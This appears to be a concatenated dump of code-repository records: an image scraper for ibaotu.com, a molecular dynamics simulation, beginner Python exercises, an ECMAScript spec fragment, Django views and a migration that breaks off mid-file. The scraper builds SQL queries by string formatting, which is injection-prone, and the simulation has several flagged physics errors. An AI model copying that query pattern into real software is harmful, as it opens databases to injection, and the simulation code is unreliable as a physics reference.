        # validip = self.validip_que.get()
        # proxy = {'http': validip}
        try:
            start_time=time.time()
            response = requests.get(src)
            if response.status_code==200:
                img_content=response.content
                with open(file_path, "wb") as f:
                    f.write(img_content)
                end_time = time.time()
                inter = end_time - start_time
                print("%s成功下载图片%s,共花费%f秒" % (self.threadName,file_path, inter))
            else:
                raise StatusCodeError("状态码错误")
        except BaseException as e:
            print("%s图片%s下载异常,错误信息为%s" % (self.threadName, src, str(e)))
            self.sqlInsertFailedUrl(src,"image")
            # self.validip_que.get(validip)
            repeat_count += 1
            if repeat_count < 4:
                print("%s图片%s下载抛出异常,正在进行第%d次重新下载!" % (self.threadName, src, repeat_count))
                self.downloadImage(src, file_path, repeat_count)
            else:
                print("%s图片%s下载失败,将添加下载失败信息到数据表" % (self.threadName, src))
                self.sqlInsertFailedUrl(src,"image")

    def makeDir(self,dir_path,type):
        """Create *dir_path* if it does not exist; *type* is only a log label."""
        try:
            if not os.path.exists(dir_path):
                os.mkdir(dir_path)
                print("%s成功创建%s%s" % (self.threadName,type,dir_path))
        except BaseException as e:
            print("%s创建%s异常,错误信息为%s"%(self.threadName,type,str(e)))

    def sqlInsertFailedUrl(self,url,type):
        """Record a failed *url* in ibaotu_failed_<type>_url (type: 'list'/'image').

        NOTE(review): the `global sql` looks unnecessary (a local would do),
        and the SQL is built by string formatting -- a URL containing a quote
        would break the statement (injection-style bug). Parameterised
        execute(sql, (url,)) would be safer.
        """
        try:
            global sql
            sql = """INSERT IGNORE INTO `ibaotu_failed_{}_url`(url) VALUES ('{}')""".format(type, url)
            if self.mysqlClient.cursor().execute(sql):
                self.mysqlClient.commit()
                print("{}成功插入一条错误的{}记录到数据库".format(self.name,type))
        except BaseException as e:
            print("{}的sqlInsertFailedUrl抛出异常,异常内容为:{}".format(self.name,str(e)))
def main():
    """Build the work queues, (optionally) warm up the proxy pool and start
    the data-collection worker threads, then wait for all URLs to be done."""
    # Start multi-threaded proxy-IP collection and put the IPs on the proxy
    # queue (the Proxy_helper startup below is currently commented out, so
    # these queues and thread counts are presently unused).
    ip_que = Queue(1200)
    validip_que = Queue(10000)
    ipCheckoutThreadMount = 15
    ipCollectThreadMount = 2
    dataCollectThreadMount = 20
    # proxy_helper = Proxy_helper(ip_que, validip_que, ipCheckoutThreadMount, ipCollectThreadMount)
    # proxy_helper.run()
    # time.sleep(10)
    # List pages 1..26 of the target category.
    url_list = ["https://ibaotu.com/tupian/biaoqingbao/%d.html"% (index) for index in range(1, 27)]
    url_que = Queue(1000)
    for arc_url in url_list:
        url_que.put(arc_url)
    for i in range(dataCollectThreadMount):
        worker = Spider("数据采集线程%d" % (i), url_que, validip_que)
        worker.start()
        print("数据采集线程%d开启" % (i))
    # Block until every queued URL has been marked done (workers are daemons).
    url_que.join()
if __name__ == "__main__":
    # Shared by all Spider threads: the lock serialises the one-time schema
    # creation and the flag records whether it has already happened.
    mysqlInitializeLock = threading.Lock()
    mysqlInitialized = False
main() | [
"2182193904@qq.com"
] | 2182193904@qq.com |
bd1dd81f8bffa61136868af7d217945ab042552e | ca8b3cd04e4f80a1b67b48b07cbaed914927f87e | /Molecular Dynamics V3.py | 4e9f2c9d2282ef8989f92e8c756d3bb5ffd3ea0c | [] | no_license | Armad1ll0/Molecular_Dynamics_Simulation | 649249ef26bf38006d5c65a8cbb387a4345321b2 | 3289a0c4a5f79b41db32cec1dac8eefd11a806b8 | refs/heads/main | 2023-01-09T12:38:35.961957 | 2020-11-09T20:01:45 | 2020-11-09T20:01:45 | 311,408,982 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,274 | py | # -*- coding: utf-8 -*-
"""
Created on Mon Nov 9 11:14:39 2020
@author: amill
"""
from sympy import *
import numpy as np
import random
import matplotlib.pyplot as plt
import math as math
import time
import matplotlib.pyplot as plt
# --- Simulation parameters (reduced Lennard-Jones-style units) ---
lx = 20
#size of simulation box for MC
simbox_size = np.array([lx, lx])
# p is the number density; sigma and epsilon are the Lennard-Jones length and
# energy scales; T is the target temperature. Nt appears unused below
# (num_time_steps is defined later instead).
p = 0.1
sigma = 1
epsilon = 2
T = 1
Nt = 50 #number of time steps
#number of particles in or box. They need to have density 0.95. Density is mass over volume
# NOTE(review): the comment above says density 0.95 but p is set to 0.1 --
# confirm which value is intended.
number_particles = int(p*lx*lx)
#array which randomly assigns the coordiantes of each particle
particle_coords = [(random.uniform(0, lx), random.uniform(0, lx))]
#radius function
def radius(x, y):
    """Return the Euclidean length sqrt(x**2 + y**2) of the displacement (x, y).

    Uses math.hypot, which is the idiomatic 2-D norm and avoids overflow or
    underflow of the intermediate squared terms. Result is always >= 0.
    """
    return math.hypot(x, y)
#while loop that generates particles and gives them coordinates iif they dont overlap within a certain radius, THIS INTIALISES THE POSITIONS
#NEED TO DO BOUNDARY CONDITIONS
# Rejection sampling: keep drawing random points until number_particles
# positions exist, each at least sigma away from all previously accepted ones.
counter = 1
while counter < number_particles:
    #automatically sets if particles are overlapping to false
    overlapping = False
    #generates random x and y coordinates for a possible new particle
    x = random.uniform(0, lx)
    y = random.uniform(0, lx)
    #for loop to check if the new particles radius is below the value we need it to be (sigma)
    for i,j in particle_coords:
        if abs(radius(x-i, y-j)) < sigma:
            overlapping = True
    #if the particles are not overlapping then it adds its coordiates to the list and increases the counter
    if overlapping == False:
        particle_coords.append([x, y])
        counter += 1
array_particle_coords = np.array(particle_coords)
#setting up random veloctiy of particle. PART OF INTIIALISING THE SYSTEM
# Each particle gets a uniform random velocity component in [-1, 1] per axis.
particle_velocities = []
for i in range(len(array_particle_coords)):
    v_x = random.uniform(-1, 1)
    v_y = random.uniform(-1, 1)
    particle_velocities.append([v_x, v_y])
particle_velocities = np.array(particle_velocities)
#trying to find average velocities across all particles in x direction
v_x_sum = 0
for i in particle_velocities:
    v_x_sum += i[0]
v_x_avg = v_x_sum/len(particle_velocities)
#trying to find average velocities across all particles in y direction
v_y_sum = 0
for i in particle_velocities:
    v_y_sum += i[1]
v_y_avg = v_y_sum/len(particle_velocities)
#which average do they want us to use for the F_s function
# NOTE(review): this squares the *sums* of the components rather than summing
# the squares of individual velocities -- verify against the assignment's
# definition of the mean-square velocity before trusting f_s below.
v_avg_square = ((v_y_sum)**2 + (v_x_sum)**2)/(2*len(particle_coords))
#equation for the drift factor given in the assessment
f_s = math.sqrt((3*T)/(v_avg_square))
#adjusting the particle velocity by the factor given in the lecture to remove intiial dift
# Subtract the centre-of-mass velocity, then rescale toward temperature T.
adjusted_initial_velocities = []
for i in particle_velocities:
    adjusted_velocity_x = (i[0]-v_x_avg) * f_s
    adjusted_velocity_y = (i[1]-v_y_avg) * f_s
    adjusted_initial_velocities.append([adjusted_velocity_x, adjusted_velocity_y])
#constants needed for lennart jones
r = 1
sigma = 1
alpha = 1
#lennart jones potential equation
# NOTE(review): dead code below -- Uprime is never used (see the author's own
# note), and the '+' between the r^-12 and r^-6 terms differs from the '-'
# used in the live potential-energy calculation further down. Confirm the
# intended sign if this expression is ever revived.
U = 4*epsilon*(((sigma/r)**12)+alpha*((sigma/r)**6))
#differential of lennart jones, just to see if I can do it
r = Symbol('r')
U = 4*epsilon*(((sigma/r)**12)+alpha*((sigma/r)**6))
Uprime = U.diff(r) #this is olllllldddddd news now with the variable being reassigned below.
#for loop to calculate the force interactions between different particles
#value of r for which force basically becomes zero
#sum of the forces in x direction
# NOTE(review): force_sum_x / force_sum_y are initialised here but never
# accumulated; force_sum_y is later (mis?)used when building `forces`.
force_sum_x = 0
#sum of forces in y direction
force_sum_y = 0
r_cutoff = 2.5
#list of particle forces in x and y direction
force_x = np.zeros(number_particles)
force_y = np.zeros(number_particles)
# Pairwise loop over unique pairs (j > i); Newton's third law is applied by
# adding the force to i and subtracting it from j.
for i in range(number_particles):
    for j in range(i+1, number_particles):
        atom1 = particle_coords[i]
        atom2 = particle_coords[j]
        #boundary conditions
        #distance in the x coords of atoms
        dx = atom1[0] - atom2[0]
        #distance in the y coords of atoms
        dy = atom1[1] - atom2[1]
        #if the value of dx is smaller when we pass it through the boundary then change it
        # NOTE(review): this is a nonstandard minimum-image construction
        # (the usual form is dx -= lx*round(dx/lx)); it also drops the sign
        # of the wrapped separation via abs(). Confirm it behaves as intended
        # for negative dx/dy.
        if lx - dx%lx < dx:
            dx = abs(lx-(dx%lx))
        #same witht eh y condition
        if lx - dy%lx < dy:
            dy = abs((lx-(dy%lx)))
        #if the radius is smaller than the cut off (lennard jones potential is basically 0 after 2.5)
        if ((dx**2) + (dy**2))**0.5 < r_cutoff:
            r = (dx**2 + dy**2)**0.5
            #differential of lennard jones potential
            # NOTE(review): with U = 4*eps*[(s/r)^12 - a*(s/r)^6] the force
            # F = -dU/dr is +4*eps*[12 s^12/r^13 - 6 a s^6/r^7]; the leading
            # minus sign here gives the opposite sign -- verify the convention.
            F = -4*epsilon*(((12*(sigma**12))/r**13) - (((alpha*6*(sigma**6))/r**7)))
            #unit values for each direction so we can seperate force into x and y units in the list.
            x_unit = (atom1[0]-atom2[0])/r
            y_unit = (atom1[1]-atom2[1])/r
            force_x[i] += F*x_unit
            force_y[i] += F*y_unit
            force_x[j] -= F*x_unit
            force_y[j] -= F*y_unit
# Particle mass (reduced units).
m=1
#kinetic energy of the system
sum_velocity_x = 0
for i in adjusted_initial_velocities:
    sum_velocity_x += i[0]**2
sum_velocity_y = 0
for i in adjusted_initial_velocities:
    sum_velocity_y += i[1]**2
total_kinetic = 0.5*m*((sum_velocity_x + sum_velocity_y))
#temperature for the system
boltzmann = 1.0
#euqation for temperature of a system
T_new = (2*total_kinetic)/(3*boltzmann)
#potential energy of the system
# NOTE(review): this double loop visits both (i, j) and (j, i), so each pair's
# contribution is added twice -- either halve the result or loop j > i as the
# force loop above does. Confirm the intended convention.
potential_energy = 0
for i in range(number_particles):
    for j in range(number_particles):
        if i == j:
            continue
        else:
            atom1 = particle_coords[i]
            atom2 = particle_coords[j]
            #boundary conditions
            #distance in the x coords of atoms
            dx = atom1[0] - atom2[0]
            #distance in the y coords of atoms
            dy = atom1[1] - atom2[1]
            #if the value of dx is smaller when we pass it through the boundary then change it
            if lx - dx%lx < dx:
                dx = abs(lx-(dx%lx))
            #same witht eh y condition
            if lx - dy%lx < dy:
                dy = abs((lx-(dy%lx)))
            #if the radius is smaller than the cut off (lennard jones potential is basically 0 after 2.5)
            if ((dx**2) + (dy**2))**0.5 < r_cutoff:
                r = (dx**2 + dy**2)**0.5
                #equation for lennard jones potential energy
                U_potential = 4*epsilon*((sigma/r)**12 - alpha*((sigma/r)**6))
                potential_energy += U_potential
#total energy of the system
total_energy = total_kinetic + potential_energy
#constants needed for iterations, N is number of time steps and dt is the change in time
num_time_steps = 1000
dt = 0.01
#these are the arrays we will add stuff to. We can use hstack method to add a new array to the end of an array
particles = array_particle_coords
velocities = np.array(adjusted_initial_velocities)
# NOTE(review): force_sum_y here is the scalar 0 from above -- this probably
# should be force_y (the per-particle array). `forces` appears unused later,
# so the slip is currently harmless; confirm before relying on it.
forces = np.array([force_x, force_sum_y])
# Split coordinates and velocities into separate per-axis arrays; these hold
# the positions at time step t-1 for the Verlet recursion below.
x_pos_particle_1 = []
for i in particle_coords:
    x_pos_particle_1.append(i[0])
x_pos_particle_1 = np.array(x_pos_particle_1)
y_pos_particle_1 = []
for i in particle_coords:
    y_pos_particle_1.append(i[1])
y_pos_particle_1 = np.array(y_pos_particle_1)
x_velocity = []
for i in velocities:
    x_velocity.append(i[0])
x_velocity = np.array(x_velocity)
y_velocity = []
for i in velocities:
    y_velocity.append(i[1])
y_velocity = np.array(y_velocity)
# First Verlet step: x(t+dt) = x + v*dt + F*dt^2/(2m), wrapped into the box.
x_pos_particle_2 = []
for i in range(len(x_pos_particle_1)):
    new_x_position = (x_pos_particle_1[i] + x_velocity[i]*dt + (0.5*force_x[i]*(dt**2))/m)%lx
    x_pos_particle_2.append(new_x_position)
y_pos_particle_2 = []
for i in range(len(y_pos_particle_1)):
    new_y_position = (y_pos_particle_1[i] + y_velocity[i]*dt + (0.5*force_y[i]*(dt**2))/m)%lx
    y_pos_particle_2.append(new_y_position)
#===================================================================================================================
#ALL BETWEEN THE EQUALS SIGNS NEEDS TO BE PUT IN A WHILE LOOP TO ITERATE OVER IT
#have a look at the puesdocode but this is the first stage we need to put in a loop
counter = 2 #this is because we have already calculated the first couple of positions before, so technically the first run of the loop is on the third time step
#this is a frequency counter asked for in the paper
f_log = 20
# Main integration loop: position-Verlet with lists 1/2/3 holding the
# positions at t-1, t and t+1 respectively, rotated at the end of each step.
while counter < num_time_steps:
    positions_array_for_force_calc = np.array((x_pos_particle_2, y_pos_particle_2)).T
    force_x = np.zeros(number_particles)
    force_y = np.zeros(number_particles)
    # Recompute pairwise forces at the current (time t) positions.
    for i in range(number_particles):
        for j in range(i+1, number_particles):
            atom1 = positions_array_for_force_calc[i]
            atom2 = positions_array_for_force_calc[j]
            #boundary conditions
            #distance in the x coords of atoms
            dx = atom1[0] - atom2[0]
            #distance in the y coords of atoms
            dy = atom1[1] - atom2[1]
            #if the value of dx is smaller when we pass it through the boundary then change it
            if lx - dx%lx < dx:
                dx = abs(lx-(dx%lx))
            #same witht eh y condition
            if lx - dy%lx < dy:
                dy = abs((lx-(dy%lx)))
            #if the radius is smaller than the cut off (lennard jones potential is basically 0 after 2.5)
            if ((dx**2) + (dy**2))**0.5 < r_cutoff:
                r = (dx**2 + dy**2)**0.5
                #differential of lennard jones potential
                F = -4*epsilon*(((12*(sigma**12))/r**13) - (((alpha*6*(sigma**6))/r**7)))
                #unit values for each direction so we can seperate force into x and y units in the list.
                x_unit = (atom1[0]-atom2[0])/r
                y_unit = (atom1[1]-atom2[1])/r
                force_x[i] += F*x_unit
                force_y[i] += F*y_unit
                force_x[j] -= F*x_unit
                force_y[j] -= F*y_unit
    #below is to check whether the sum of the forces are roughly = 0
    # =============================================================================
    # x = sum(force_x) + sum(force_y)
    # print('the sum of the forces is ', + x)
    # =============================================================================
    #then we will use this function to calculate the new positions based off the 2 previous lists.
    # Verlet position update; %lx wraps the particles back into the box.
    x_pos_particle_3 = []
    y_pos_particle_3 = []
    for i in range(number_particles):
        new_x_position = (2*x_pos_particle_2[i] - x_pos_particle_1[i] + (force_x[i]/m)*(dt**2))%lx
        x_pos_particle_3.append(new_x_position)
        new_y_position = (2*y_pos_particle_2[i] - y_pos_particle_1[i] + (force_y[i]/m)*(dt**2))%lx
        y_pos_particle_3.append(new_y_position)
    #then we create the new velocity
    # Central difference v(t) = (x(t+dt) - x(t-dt)) / (2 dt).
    # NOTE(review): positions are stored box-wrapped, so this difference (and
    # the Verlet update above) is discontinuous when a particle crosses a
    # boundary, producing spurious velocity spikes -- confirm whether
    # unwrapped coordinates should be kept for the finite differences.
    for i in range(number_particles):
        new_velocity_x = (x_pos_particle_3[i] - x_pos_particle_1[i])/(2*dt)
        x_velocity[i] = new_velocity_x
        new_velocity_y = (y_pos_particle_3[i] - y_pos_particle_1[i])/(2*dt)
        y_velocity[i] = new_velocity_y
    #kinetic energy of the system
    sum_velocity_x = 0
    for i in x_velocity:
        sum_velocity_x += i**2
    sum_velocity_y = 0
    for i in y_velocity:
        sum_velocity_y += i**2
    total_kinetic = 0.5*m*((sum_velocity_x + sum_velocity_y))
    #temperature for the system
    boltzmann = 1.0
    #euqation for temperature of a system
    T_new = (2*total_kinetic)/(3*boltzmann)
    #potential energy of the system
    # NOTE(review): as in the initial calculation, this i != j double loop
    # counts every pair twice.
    potential_energy = 0
    for i in range(number_particles):
        for j in range(number_particles):
            if i == j:
                continue
            else:
                atom1 = positions_array_for_force_calc[i]
                atom2 = positions_array_for_force_calc[j]
                #boundary conditions
                #distance in the x coords of atoms
                dx = atom1[0] - atom2[0]
                #distance in the y coords of atoms
                dy = atom1[1] - atom2[1]
                #if the value of dx is smaller when we pass it through the boundary then change it
                if lx - dx%lx < dx:
                    dx = abs(lx-(dx%lx))
                #same witht eh y condition
                if lx - dy%lx < dy:
                    dy = abs((lx-(dy%lx)))
                #if the radius is smaller than the cut off (lennard jones potential is basically 0 after 2.5)
                if ((dx**2) + (dy**2))**0.5 < r_cutoff:
                    r = (dx**2 + dy**2)**0.5
                    #equation for lennard jones potential energy
                    U_potential = 4*epsilon*((sigma/r)**12 - alpha*((sigma/r)**6))
                    potential_energy += U_potential
    #total energy of the system
    total_energy = total_kinetic + potential_energy
    counter += 1
    # Log the energies and temperature every f_log steps.
    if counter%f_log == 0:
        print('KE =', total_kinetic)
        print('PE =', potential_energy)
        print('Total Energy =', total_kinetic + potential_energy)
        print('The new Temperature of the system is', T_new)
    #then we need to reassign the names of the lists so they get iterated between over and over again. Thi is a long winded way so i understand what is going on.
    # Rotate the three position buffers: t -> t-1 and t+1 -> t.
    oldest_x = x_pos_particle_1
    old_x = x_pos_particle_2
    not_old_x = x_pos_particle_3
    oldest_x = []
    oldest_x = old_x
    old_x = not_old_x
    x_pos_particle_1 = oldest_x
    x_pos_particle_2 = old_x
    oldest_y = y_pos_particle_1
    old_y = y_pos_particle_2
    not_old_y = y_pos_particle_3
    oldest_y = []
    oldest_y = old_y
    old_y = not_old_y
    y_pos_particle_1 = oldest_y
    y_pos_particle_2 = old_y
#===================================================================================================================
#this sets up our scatter plot which will show the initial state of the particles, this may need to change soon though as the particles evolve.
x = array_particle_coords[:,0]
y = array_particle_coords[:,1]
plt.plot(x,y, 'o')
| [
"noreply@github.com"
] | Armad1ll0.noreply@github.com |
d31d05836e122f1201a45888d38ad9e2b8ef9725 | 4348c47ca6f28ac6d403bfdcccd4001861d0959e | /functionloopbasic2.py | 15ee6f0af5fbb834d53d981104d45574d99487af | [] | no_license | elephantebae/PythonStack | 26d9e6488ccb4aa80e3a9d35d3e95b3715793a50 | 6f6f5bf8b620793bf8680ed106869ed9661f59d3 | refs/heads/master | 2020-04-08T14:46:10.634128 | 2018-11-28T05:57:33 | 2018-11-28T05:57:33 | 159,451,024 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,123 | py | # Biggie Size - Given a list, write a function that changes all positive numbers in the list to "big".
# Example: biggie_size([-1, 3, 5, -5]) returns that same list, but whose values are now [-1, "big", "big", -5]
# def biggie_size(a):
# for num in range(0,len(a),1):
# if a[num] > 0:
# a[num] = "big"
# print(a)
# biggie_size([-1, 3, 5, -5])
# Count Positives - Given a list of numbers, create a function to replace the last value with the number of positive values. (Note that zero is not considered to be a positive number).
# Example: count_positives([-1,1,1,1]) changes the original list to [-1,1,1,3] and returns it
# Example: count_positives([1,6,-4,-2,-7,-2]) changes the list to [1,6,-4,-2,-7,2] and returns it
# def count_positives(a):
# count = 0
# for num in range(0, len(a) ,1):
# if a[num] > 0:
# count += 1
# a[len(a)-1] = count
# return a
# print(count_positives([1,6,-4,-2,-7,-2]))
# Sum Total - Create a function that takes a list and returns the sum of all the values in the array.
# Example: sum_total([1,2,3,4]) should return 10
# Example: sum_total([6,3,-2]) should return 7
# def sum_total(a):
# sum = 0
# for num in range(0, len(a), 1):
# sum += a[num]
# return sum
# print (sum_total([6,3,-2]))
# Average - Create a function that takes a list and returns the average of all the values.
# Example: average([1,2,3,4]) should return 2.5
# def average(a):
# sum = 0
# for num in range(0,len(a), 1):
# sum += a[num]
# return sum/len(a)
# print (average([1,2,3,4]))
# Length - Create a function that takes a list and returns the length of the list.
# Example: length([37,2,1,-9]) should return 4
# Example: length([]) should return 0
# def length(a):
# return len(a)
# print(length([37,2,1,-9]))
# Minimum - Create a function that takes a list of numbers and returns the minimum value in the list. If the list is empty, have the function return False.
# Example: minimum([37,2,1,-9]) should return -9
# Example: minimum([]) should return False
# def minimum(a):
# if len(a) == 0:
# return False
# min = a[0]
# for num in range(0, len(a), 1):
# if a[num] < min:
# min = a[num]
# return min
# print(minimum([37,2,1,-9]))
# print(minimum([]))
# Maximum - Create a function that takes a list and returns the maximum value in the array. If the list is empty, have the function return False.
# Example: maximum([37,2,1,-9]) should return 37
# Example: maximum([]) should return 0
# def maximum(a):
# if len(a) == 0:
# return False
# max = a[0]
# for num in range(0,len(a),1):
# if a[num] > max:
# max = a[num]
# return max
# print(maximum([37,2,1,-9]))
# print(maximum([]))
# Ultimate Analysis - Create a function that takes a list and returns a dictionary that has the sumTotal, average, minimum, maximum and length of the list.
# Example: ultimate_analysis([37,2,1,-9]) should return {'sumTotal': 31, 'average': 7.75, 'minimum': -9, 'maximum': 37, 'length': 4 }
def ultimate_analysis(a):
    """Return summary statistics for the list `a`.

    :param a: list of numbers (may be empty).
    :return: dict with keys 'sumTotal', 'average', 'minimum', 'maximum',
             'length', e.g. ultimate_analysis([37,2,1,-9]) ->
             {'sumTotal': 31, 'average': 7.75, 'minimum': -9, 'maximum': 37, 'length': 4}
    """
    if not a:
        # Fix: the original divided by len(a) (ZeroDivisionError) on [].
        # Report zeros for an empty list instead of crashing.
        return {'sumTotal': 0, 'average': 0, 'minimum': 0, 'maximum': 0, 'length': 0}
    total = sum(a)
    return {
        'sumTotal': total,
        'average': total / len(a),
        # Fix: min/max were seeded with 0, so all-positive lists reported
        # minimum 0 and all-negative lists reported maximum 0. Seeding from
        # the data itself (via the builtins) is always correct.
        'minimum': min(a),
        'maximum': max(a),
        'length': len(a),
    }
print(ultimate_analysis([37,2,1,-9]))
# Reverse List - Create a function that takes a list and return that list with values reversed. Do this without creating a second list.
# (This challenge is known to appear during basic technical interviews.)
# Example: reverse_list([37,2,1,-9]) should return [-9,1,2,37]
# def reverse_list(a):
# temp = 0
# count = 0
# for num in range(0,(len(a)-1)//2, 1):
# temp= a[num]
# a[num] = a[(len(a)-1)-count]
# a[(len(a)-1)-count] = temp
# count += 1
# return a
# print (reverse_list([37,2,1,-9])) | [
"paul.bae.j@gmail.com"
] | paul.bae.j@gmail.com |
2f9e3f9b1f607d3f89fc3e056f19fcccad2f74fe | 28a462a28f443c285ca5efec181ebe36b147c167 | /tests/compile/basic/recent/String.prototype.startsWith.spec | ba62e090c26d2ee9be97ca1a97a2010796ad2856 | [
"BSD-3-Clause",
"BSD-2-Clause"
] | permissive | kaist-plrg/jstar | 63e71f9156860dc21cccc33a9f6c638dfee448ea | 1282919127ea18a7e40c7a55e63a1ddaaf7d9db4 | refs/heads/main | 2022-07-22T08:12:34.947712 | 2022-02-27T04:19:33 | 2022-02-27T11:06:14 | 384,045,526 | 6 | 4 | NOASSERTION | 2022-02-27T11:05:26 | 2021-07-08T07:53:21 | Python | UTF-8 | Python | false | false | 884 | spec | 1. Let _O_ be ? RequireObjectCoercible(*this* value).
1. Let _S_ be ? ToString(_O_).
1. Let _isRegExp_ be ? IsRegExp(_searchString_).
1. If _isRegExp_ is *true*, throw a *TypeError* exception.
1. Let _searchStr_ be ? ToString(_searchString_).
1. Let _len_ be the length of _S_.
1. If _position_ is *undefined*, let _pos_ be 0; else let _pos_ be ? ToIntegerOrInfinity(_position_).
1. Let _start_ be the result of clamping _pos_ between 0 and _len_.
1. Let _searchLength_ be the length of _searchStr_.
1. If _searchLength_ = 0, return *true*.
1. Let _end_ be _start_ + _searchLength_.
1. If _end_ > _len_, return *false*.
1. Let _substring_ be the substring of _S_ from _start_ to _end_.
1. Return ! SameValueNonNumeric(_substring_, _searchStr_). | [
"h2oche22@gmail.com"
] | h2oche22@gmail.com |
b4476bd184b08f4a534601ef4b8fc636735e8681 | d4d048ca450a25300912b083ec0010826b19d1b6 | /django/Courses/apps/courses/views.py | c02ab4b527e84168b54170a9ce78c3433fccbc64 | [] | no_license | codexnubes/Coding_Dojo | dfb4815bf7d21292f45e03e7dde5249f65734828 | 9259f465bc24c44e4c8d7bcfd93b5349ca7948ec | refs/heads/master | 2021-01-12T05:59:59.464600 | 2016-12-19T17:16:50 | 2016-12-19T17:16:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,302 | py | from django.shortcuts import render, redirect
from models import Courses, Descriptions
# Create your views here.
def index(request):
    # List view: every Descriptions row with its related course prefetched.
    # NOTE: Python 2 syntax (print statement) — this file predates Python 3.
    show_data = Descriptions.objects.select_related()
    context = {'data': show_data}
    # Debug: dump the SQL the queryset will run (lazy; not executed here).
    print show_data.query
    return render(request,
        'courses/index.html', context)
def add(request):
    # Create a Courses row plus its Descriptions row from the posted form.
    if request.method == 'POST':
        course_name = request.POST['name']
        description_post = request.POST['description']
        # Reject blank submissions outright.
        if course_name == "" or description_post == "":
            return redirect('/')
    # NOTE(review): the lines below sit outside the POST branch, so a plain
    # GET request reaches them with course_name undefined and raises
    # NameError — confirm whether they were meant to be inside the if.
    c = Courses(name = course_name)
    c.save()
    # Description rows carry the FK back to the course they describe.
    d = Descriptions(description = description_post, course = c)
    d.save()
    return redirect('/')
def remove(request, course_id):
    # GET: render a confirmation page; POST: delete the course + description.
    if request.method == "GET":
        show_data = Descriptions.objects.get(course = course_id)
        # NOTE(review): this prints the *builtin* `id` function, probably
        # meant `course_id` — Python 2 debug print left behind.
        print id, "get request"
        context = {"course_id": course_id,
        "data": show_data}
        return render(request,
        'courses/remove.html', context)
    elif request.method == "POST":
        c = Courses.objects.get(id = course_id)
        d = Descriptions.objects.get(course = c)
        # Delete the dependent description before the course it points at.
        d.delete()
        c.delete()
        print c
        print d
        print course_id, "POST request"
        return redirect('/')
| [
"ameyers@flowroute.com"
] | ameyers@flowroute.com |
1106a0f39febeab1ad45a61a9a231f43c6ca3343 | 83e9d40f37e0805d21c99450f7f6a469c39411cc | /blog/migrations/0002_post_slug.py | 146a12dc7305a9e03c9580c4fadbe83945b3a6b4 | [] | no_license | rahulvashistha/blog-project-drf | 30d216fc02b640af41c0060e6048b16d86bd9d87 | 93845578e5a4ba05e8eb5d3168296c364fc7af6d | refs/heads/main | 2023-08-18T07:15:43.506873 | 2021-09-29T06:54:38 | 2021-09-29T06:54:38 | 411,560,496 | 1 | 0 | null | 2021-09-29T06:45:39 | 2021-09-29T06:45:38 | null | UTF-8 | Python | false | false | 415 | py | # Generated by Django 3.2.6 on 2021-08-19 06:21
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated: adds a required `slug` column to blog.Post.
    dependencies = [
        ('blog', '0001_initial'),
    ]
    operations = [
        migrations.AddField(
            model_name='post',
            name='slug',
            field=models.CharField(default='', max_length=140),
            # The '' default only back-fills existing rows during this
            # migration; it is not kept on the model afterwards.
            preserve_default=False,
        ),
    ]
| [
"rahul@technoarchsoftwares.com"
] | rahul@technoarchsoftwares.com |
18a541eb199a366a26985dc3e4063e252c7cb77b | 614fd71ba186129705a82c8f2650c76e4f9dbae0 | /book/migrations/0002_auto_20210307_0538.py | 9c72d4b78e06279c844702147613f31a0f64cbf3 | [] | no_license | marlinbleriaux/kmbbook | b736cdca88a532f75046ad6fe1fd395cbf01c075 | 8871fded38a9e7d4a30ac573ba06c0eb7ade4fd7 | refs/heads/master | 2023-03-18T22:06:06.800353 | 2021-03-13T15:54:08 | 2021-03-13T15:54:08 | 347,408,217 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,063 | py | # Generated by Django 3.1.5 on 2021-03-07 04:38
import datetime
from django.db import migrations, models
import django.db.models.deletion
from django.utils.timezone import utc
class Migration(migrations.Migration):
    # Auto-generated: introduces the Campus/Cursus/Faculte/Fonction reference
    # tables, fleshes out Personne with identity fields, and adds the
    # Message model plus the Etudiant/Employe multi-table subclasses.
    dependencies = [
        ('book', '0001_initial'),
    ]
    operations = [
        migrations.CreateModel(
            name='Campus',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('nom', models.CharField(max_length=30)),
                ('adresse_postale', models.CharField(max_length=60)),
            ],
        ),
        migrations.CreateModel(
            name='Cursus',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('intitule', models.CharField(max_length=30)),
            ],
        ),
        migrations.CreateModel(
            name='Faculte',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('nom', models.CharField(max_length=30)),
                ('couleur', models.CharField(max_length=6)),
            ],
        ),
        migrations.CreateModel(
            name='Fonction',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('intitule', models.CharField(max_length=30)),
            ],
        ),
        migrations.AddField(
            model_name='personne',
            name='amis',
            # Self-referential friendship link; the '+' related_name suppresses
            # the reverse accessor.
            field=models.ManyToManyField(related_name='_personne_amis_+', to='book.Personne'),
        ),
        # NOTE(review): the datetime defaults below are concrete timestamps
        # captured when `makemigrations` prompted for a one-off default; with
        # preserve_default=False they only back-fill pre-existing rows and are
        # dropped from the model afterwards. Harmless, but odd for CharFields.
        migrations.AddField(
            model_name='personne',
            name='courriel',
            field=models.EmailField(default=datetime.datetime(2021, 3, 7, 4, 37, 16, 818888, tzinfo=utc), max_length=254),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='personne',
            name='date_de_naissance',
            field=models.DateField(default=datetime.datetime(2021, 3, 7, 4, 37, 48, 905611, tzinfo=utc)),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='personne',
            name='id',
            field=models.AutoField(auto_created=True, default=1),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='personne',
            name='matricule',
            field=models.CharField(default=datetime.datetime(2021, 3, 7, 4, 38, 22, 324372, tzinfo=utc), max_length=10),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='personne',
            name='nom',
            field=models.CharField(default=datetime.datetime(2021, 3, 7, 4, 38, 26, 883722, tzinfo=utc), max_length=30),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='personne',
            name='prenom',
            field=models.CharField(default=datetime.datetime(2021, 3, 7, 4, 38, 31, 275136, tzinfo=utc), max_length=30),
            preserve_default=False,
        ),
        migrations.CreateModel(
            name='Message',
